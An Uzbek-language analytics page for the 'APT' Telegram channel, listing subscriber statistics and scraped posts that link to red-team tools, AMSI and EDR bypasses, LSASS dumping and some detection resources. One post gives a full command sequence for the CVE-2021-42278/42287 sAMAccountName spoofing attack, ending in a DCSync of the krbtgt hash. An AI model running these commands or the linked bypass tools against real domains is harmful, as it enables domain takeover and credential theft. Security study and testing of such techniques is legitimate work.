uz
Feedback
APT

APT

Kanalga Telegram’da o‘tish

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Ko'proq ko'rsatish
Rossiya45 554Texnologiyalar & Aralashmalar8 834

📈 Telegram kanali APT analitikasi

APT (@apt_notes) Ingliz til segmentidagi kanali faol ishtirokchi. Hozirda hamjamiyat 14 682 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 8 834-o'rinni va Rossiya mintaqasida 45 554-o'rinni egallagan.

📊 Auditoriya ko‘rsatkichlari va dinamika

невідомо sanasidan buyon loyiha tez o‘sib, 14 682 obunachiga ega bo‘ldi.

13 Iyun, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 414 ga, so‘nggi 24 soatda esa 17 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.

  • Tasdiqlash holati: Tasdiqlanmagan
  • Jalb etish (ER): Auditoriya o‘rtacha 50.76% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining N/A% ini tashkil etuvchi reaksiyalarni to‘playdi.
  • Post qamrovi: Har bir post o‘rtacha 7 449 marta ko‘riladi; birinchi sutkada odatda 0 ta ko‘rish yig‘iladi.
  • Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 20 ta reaksiya keladi.

📝 Tavsif va kontent siyosati

Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Yuqori yangilanish chastotasi (oxirgi ma’lumot 14 Iyun, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.

14 682
Obunachilar
+1724 soatlar
+1027 kunlar
+41430 kunlar
Postlar arxiv
APT
APT
14 682
GitLab CI jobs unmasked passwords scanner https://github.com/Whitespots-OU/gitlab-ci-secrets #tools #secrets #devsecops

APT
APT
14 682
Find-Hardcoded You can find hardcoded API key, secret, token, etc... https://github.com/arijitdirghanji/Find-Hardcoded #andro
Find-Hardcoded You can find hardcoded API key, secret, token, etc... https://github.com/arijitdirghanji/Find-Hardcoded #android #apk #find #secrets #tools

APT
APT
14 682
Exploiting CVE-2021-42287/CVE-2021-42278 (Linux) https://github.com/WazeHell/sam-the-admin #ad #pac #s4u2self #windows #redte
Exploiting CVE-2021-42287/CVE-2021-42278 (Linux) https://github.com/WazeHell/sam-the-admin #ad #pac #s4u2self #windows #redteam

APT
APT
14 682
ADenum ADEnum is a pentesting tool that allows to find misconfiguration through the protocol LDAP and exploit some of those w
ADenum ADEnum is a pentesting tool that allows to find misconfiguration through the protocol LDAP and exploit some of those weaknesses with Kerberos. https://github.com/SecuProject/ADenum #ad #ldap #kerberos #enumeration #tools

APT
APT
14 682
Automated Exploitation of the CVE-2021-42287/CVE-2021-42278 (Windows) Binary: https://github.com/cube0x0/noPac PowerShell: ht
Automated Exploitation of the CVE-2021-42287/CVE-2021-42278 (Windows) Binary: https://github.com/cube0x0/noPac PowerShell: https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6 #ad #pac #s4u2self #windows #redteam

APT
APT
14 682
FUD AMSI Bypass Just released a new obfuscated AMSI bypass script based on 'amsiInitFailed'. https://github.com/tihanyin/PSSW
FUD AMSI Bypass Just released a new obfuscated AMSI bypass script based on 'amsiInitFailed'. https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_12.ps1 #amsi #bypass #windows #pentest

APT
APT
14 682
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278) Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with an "$" at the end of the name This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller. Example: 0. Create a сomputer account addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword' 1. Clear its SPNs addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController 2. Rename the computer (computer -> DC) renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password' 3. Obtain a TGT getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword' 4. Reset the computer name renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password' 5. Bbtain a service ticket with S4U2self by presenting the previous TGT KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController' 6. DCSync by presenting the service ticket KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local' # https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html # https://exploit.ph/more-samaccountname-impersonation.html # https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing # https://www.geekby.site/2021/12/samaccountname-spoofing/ # https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383 #ad #pac #s4u2self #windows #redteam

APT
APT
14 682
#meme
#meme

APT
APT
14 682
ldapconsole It's a script allowing to perfom custom LDAP queries to a Windows domain and select specific attributes. Features — Authenticate with password — Authenticate with LM:NT hashes — Authenticate with kerberos ticket https://github.com/p0dalirius/ldapconsole #ldap #query #tools

APT
APT
14 682
Log4j RCE — CVE-2021-44228 The vulnerability allows for unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services. # https://www.lunasec.io/docs/blog/log4j-zero-day/ # https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6 # https://github.com/whwlsfb/Log4j2Scan # https://github.com/Cybereason/Logout4Shell #apache #log4j #cve #rce

APT
APT
14 682
Example Reports If you're looking for examples of pentest reports, globalcptc has released redacted versions of the teams that made it to finals for the last 2 years (25 reports) https://github.com/nationalcptc/report_examples

APT
APT
14 682
Detecting NTLM Relay Attacks https://posts.bluraven.io/detecting-ntlm-relay-attacks-d92e99e68fb9 #detection #ntlm #relay #blueteam

APT
APT
14 682
ipsourcebypass This Python script can be used to bypass IP source restrictions using HTTP headers. https://github.com/p0dalir
ipsourcebypass This Python script can be used to bypass IP source restrictions using HTTP headers. https://github.com/p0dalirius/ipsourcebypass #ip #header #bypass #bugbounty

APT
APT
14 682
Process Ghosting — EDR Evasion The technique Process Herpaderping attempts to perform evasion by performing modification of the file (image tampering) which creates the process on a windows system. Deleting also the file during the creation of the process can have the same results. Even though some endpoint products have mature over the years and are able to detect complex threats organizations should constantly test the capabilities of their solution and should find alternate methods of detection even for the same technique. https://pentestlaboratories.com/2021/12/08/process-ghosting/ #av #evasion #process #redteam #blueteam

APT
APT
14 682
MAL-CL — Malicious Command-Line MAL-CL aims to collect and document real world and most common "malicious" command-line execu
MAL-CL — Malicious Command-Line MAL-CL aims to collect and document real world and most common "malicious" command-line executions of different tools and utilities while providing actionable detections and resources for the blue team. https://github.com/3CORESec/MAL-CL #windows #cli #detection #blueteam #redteam

APT
APT
14 682
Downgrading Kerberos Encryption & Why It Doesn’t Work In Server 2019 How we make Kerberos tickets use weaker encryption, the "TGT delegation trick", and why none of it works if the domain controllers are Windows Server 2019. https://vbscrub.com/2021/12/04/downgrading-kerberos-encryption-amp-why-it-doesnt-work-in-server-2019/ #kerberos #windows2019 #pentest

APT
APT
14 682
EDRSandBlast EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring. https://github.com/wavestone-cdt/EDRSandblast #lsass #dump #etw #redteam

APT
APT
14 682
Extracting passwords from hiberfil.sys When in password hunting mode and having access to the filesystem of the target, most
Extracting passwords from hiberfil.sys When in password hunting mode and having access to the filesystem of the target, most people would reach out to SAM and/or extracting cached credentials. People often overlooked is hiberfil.sys and/or virtual machine snapshots or memory dumps, as they usually contain passwords in plain text. https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps #hiberfil #dump #password

APT
APT
14 682
Abusing Leaked Handles to Dump LSASS Memory # https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html # https://github.com/antonioCoco/MalSeclogon #seclogon #lsass #dump #redteam

APT
APT
14 682
#meme
#meme